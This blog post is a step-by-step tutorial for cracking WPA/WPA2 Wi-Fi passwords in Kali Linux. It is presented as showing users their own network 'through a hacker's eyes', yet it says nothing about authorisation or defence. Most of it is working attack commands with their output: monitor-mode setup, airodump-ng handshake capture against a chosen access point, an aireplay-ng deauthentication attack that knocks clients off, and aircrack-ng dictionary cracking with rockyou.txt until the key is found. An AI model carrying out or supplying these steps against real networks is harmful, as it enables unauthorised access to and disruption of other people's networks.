Follow by Email

Blog Archive

Search This Blog

Everything you need to know about Wifi Hacking

In this article, I propose to ordinary users, perhaps far from the security audit questions of wireless Wi-Fi networks, to look at their Wi-Fi network through the eyes of a hacker, and even to wonder how to hack Wi-Fi
Share it:
The use of wireless Wi-Fi networks has now become very common. Many users think about the security of their networks and computers, sometimes they have questions, how to hack Wi-Fi, how real is this threat?
How to hack wifi

In this article, I propose to ordinary users, perhaps far from the security audit questions of wireless Wi-Fi networks, to look at their Wi-Fi network through the eyes of a hacker, and even to wonder how to hack Wi-Fi ?
Although the material is further described as simple as possible, we cannot do without concepts specific to the Wi-Fi audit.

Wi-Fi network terms
Access Point  abbreviated as AP , AP is the device that provides the Wi-Fi network, Clients are connected to it. Most often access points are routers.
Client ( Station ) - a device that connects to the Access Point. Most often these are computers, laptops, cell phones, etc.
ESSID and SSID are the names of wireless Wi-Fi networks - you see them when you choose which network to connect to. Strictly speaking, ESSID and SSID are not the same thing, but these terms are often used interchangeably in Wi-Fi auditing. In the screenshot below, the ESSID (network names) are MiAl, wifi88, etc .:
BSSID is the MAC address of the wireless card. Example MAC address: 50: 46: 5D: 6E: 8C: 20.
Handshake  - data exchanged between the station and the access point at the time of the creation of Wi-Fi connection. This data contains information that allows you to choose a password from the Wi-Fi network.
Brute-force (also brute force ) - a method of attacking a password, which consists in enumerating all possible options for a password. It requires a lot of time and computing resources.
Dictionary brute force ( dictionary attack ) is a method of attacking a password, which consists in enumerating common password options. It has a good ratio of resources spent to the results obtained.
Wi-Fi password brute force online - password guessing method, which consists in connecting to the Access Point with various candidates for passwords. Practically not used due to extremely low speed brute force.
Off-line Wi-Fi password brute force - a password selection method that consists in capturing the Handshake and selecting a password that matches this handshake. This selection does not require connection to the Access Point and is performed many orders of magnitude faster than online busting. It can also be performed on the computing power of video cards, which increases the search speed by several orders of magnitude.
WPA and WPA2 - Wi-Fi Protected Access Technology, has replaced the outdated WEP technology.
Wireless Wi-Fi card (or wireless Wi-Fi adapter ) - any network card that can connect to a Wi-Fi network. In laptops and phones, they are embedded inside the case; in desktops, they usually represent an external device connected via USB.
Monitor mode ( Monitor-Mode ) - the property of some wireless cards receive data packets, which are designed not only for them but also for other wireless devices.

Network interface - name, symbol in Linux network cards / adapters.

A Wi-Fi network channel is a conditional numerical designation of the frequency on which the Access Point is currently operating.

What is necessary for hacking Wi-Fi
  • A computer on which to install Linux
  • Specialized software, for Linux it is free (i.e. distributed for free and its source code is open)
  • Wireless Wi-Fi card that supports monitor mode. List of current maps.
  • The relevant knowledge and skills - this you will find in this article.
Wi-Fi cards with monitor mode support are commercially available, their price corresponds to the prices of other wireless cards with similar characteristics. In my laptop, the integrated card turned out to support monitor mode — that is, this is not uncommon and anyone can get it.

As already mentioned, specialized software for auditing Wi-Fi networks is distributed freely, by default it is present in specialized distributions, for example, in Kali Linux (refer to general information and installation instructions).

As you can see, all the components necessary for hacking Wi-Fi are very affordable.
All further actions are performed in Kali Linux.
Putting Wi-Fi adapter into monitor mode
By default, wireless adapters are in “managed” mode. This mode allows you to connect to the Access Point as a regular Client.

Monitor mode (monitor) is designed to analyze Wi-Fi networks. In this mode, the wireless card receives frames (they are also called frames) from any sources on the same channel.

Since we need to grab a handshake, which consists of data that the Station sends to the Access Point and the Access Point sends the Stations (that is, which are not intended for us at any stage), we need to transfer our Wi-Fi card to monitor so that she is able to see this data and save it for further processing.

To enter commands to put the Wi-Fi adapter into monitor mode, we need to know the name of the wireless interface. To do this, open the console and enter the command:
sudo iw dev
sudo iw dev









The name of the wireless interface is indicated in the line with the word Interface , i.e. in my case the name is wlan0 . Remember this value, because in the future we need it.

Monitor mode is not normal for the operating system, so some programs without demand silently put the Wi-Fi adapter into a controlled mode. This can interfere with us, so the next two teams close the programs that may prevent us:
sudo systemctl stop NetworkManager
sudo airmon-ng check kill
Now, finally, we can put the wireless card into monitor mode. To do this, follow the sequence of commands
sudo ip link set INTERFACE down
sudo iw INTERFACE set monitor control
sudo ip link set INTERFACE up
replacing with the real name of your wireless interface (mine is wlan0 ):
sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up
It seems that nothing happened, but typing

ip link set wlan0 up
In it, the type monitor line says that our wireless card is in monitor mode.
What is a handshake (handshake)
As already mentioned, a handshake is data that is transmitted in several stages between the Station and the Access Point at the moment when the Station is connected to the Access Point. This means that in order to capture a handshake, we need to switch to the channel on which the Access Point is operating, to listen to the radio signals and wait for the moment when the Station is connected to it. Since the wait can be delayed, a technique called Attack Deauthentication is applied, which consists in forcibly dropping the Wi-Fi connection between the Access Point and the Station. Immediately after such a shutdown, the Station tries to connect again, and at this moment we seize a handshake.

Unfortunately, this method does not work if no one is connected to the Access Point.

Overview of Wi-Fi networks
To attack a Wi-Fi network, we need to know some of its characteristics. To get a list of all available networks within the range of Wi-Fi access, run the following command:
sudo airodump-ng wlan0
Please note that if you have a different wireless interface name, then instead of wlan0 you need to enter this name.

The attack described is applicable only to networks with WPA2 or WPA protection — the vast majority of them.
A similar list of networks will be displayed:
airodump-ng wlan0
When you see the network in the list that you want to attack, then stop the program, to do this, press CTRL + c .
Suppose I am interested in a network with the ESSID (name) dlink . As you can see from the screenshot, its characteristics are: BSSID is 00: 1E: 58: C6: AC: FB, it uses WPA2, it works on the sixth channel. Also, the non-zero value of #Data (the captured data sent by this TD) suggests that one or more stations are connected to it.

To capture the handshake, use the following command:
sudo airodump-ng -c CHANNEL --bssid MAC_ADDRESS -w FILE INTERFACE
Where:
  • CHANNEL is the channel on which TD operates
  • MAC_ADDRESS is the BSSID of the attacked TD.
  • FILE - the name of the file where the handshake will be written
  • INTERFACE - the name of the wireless interface in monitor mode
For my data, the command looks like this:
sudo airodump-ng -c 6 --bssid 00:1E:58:C6:AC:FB -w capture wlan0
In the next screenshot, the TD we are interested in is again visible, and also the section with stations is now visible:
sudo airodump-ng
The section with stations was also present in the full list of TDs, but it went beyond the bottom edge of the screen, so I didn’t get the screenshot.

For the station, we can see in the BSSID field the value that corresponds to the BSSID of the Access Point, i.e. 00: 1E: 58: C6: AC: FB, this means that at the moment this Station is connected to the TD we are interested in. Now there are two options:
  1. wait until the Station disconnects and reconnects to the AP for natural reasons
  2. perform a deauthentication attack to speed up the process
Perform deauthentication attack
To perform deauthentication, without stopping recording traffic that was started in the previous step, open a new console window and enter the command like this:
sudo aireplay-ng -0 3 -a MAC_ADDRESS INTERFACE
In my case, the command looks like this:
sudo aireplay-ng -0 3 -a 00:1E:58:C6:AC:FB  wlan0
The program will display something like the following:
aireplay-ng

08:17:30  Waiting for beacon frame (BSSID: 00:1E:58:C6:AC:FB) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
08:17:30  Sending DeAuth to broadcast -- BSSID: [00:1E:58:C6:AC:FB]
08:17:30  Sending DeAuth to broadcast -- BSSID: [00:1E:58:C6:AC:FB]
08:17:31  Sending DeAuth to broadcast -- BSSID: [00:1E:58:C6:AC:FB]
And in the upper right corner of the screen to capture data, a new entry will appear:
capture handshake

WPA handshake: 00:1E:58:C6:AC:FB
It means that the handshake has been successfully captured.
Wi-Fi password dictionary attack
Now we need to run the data lookup.
Prepare a dictionary: rockyou.txt Password dictionary
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt
The dictionary file in this case is called newrockyou.txt . To find out the name of the captured handshake, run the following command:
ls -l capture*
At the same time, something like the following will be displayed (there may be more records if you repeatedly grabbed handshakes):
-rw-r--r-- 1 root root 73164 сен 30 08:24 capture-01.cap
-rw-r--r-- 1 root root   478 сен 30 08:24 capture-01.csv
-rw-r--r-- 1 root root   583 сен 30 08:24 capture-01.kismet.csv
-rw-r--r-- 1 root root  2766 сен 30 08:24 capture-01.kismet.netxml
We are only interested in the file capture-01.cap - it contains the handshake. The dictionary uses the following command:
aircrack-ng -w newrockyou.txt capture-01.cap
This command starts password guessing, the following window is displayed during the search:
aircrack-ng
Password matched:
aircrack-ng
This is what the KEY FOUND entry says ! [pattayateam] , in which the password from the Wi-Fi network is pattayateam. Using this password, you can connect to a wireless access point from any device (computer, phone) as other legitimate users do.

Conclusion
As you can see, hacking Wi-Fi is not extremely difficult, although it requires knowledge of some Linux commands. It shows only one example of the many variations of attacks on Wi-Fi
Make sure to check this article for USB Wi-Fi adapters That support monitor mode and wireless injection
Share it:

Wifi Hacking

Post A Comment:

0 comments: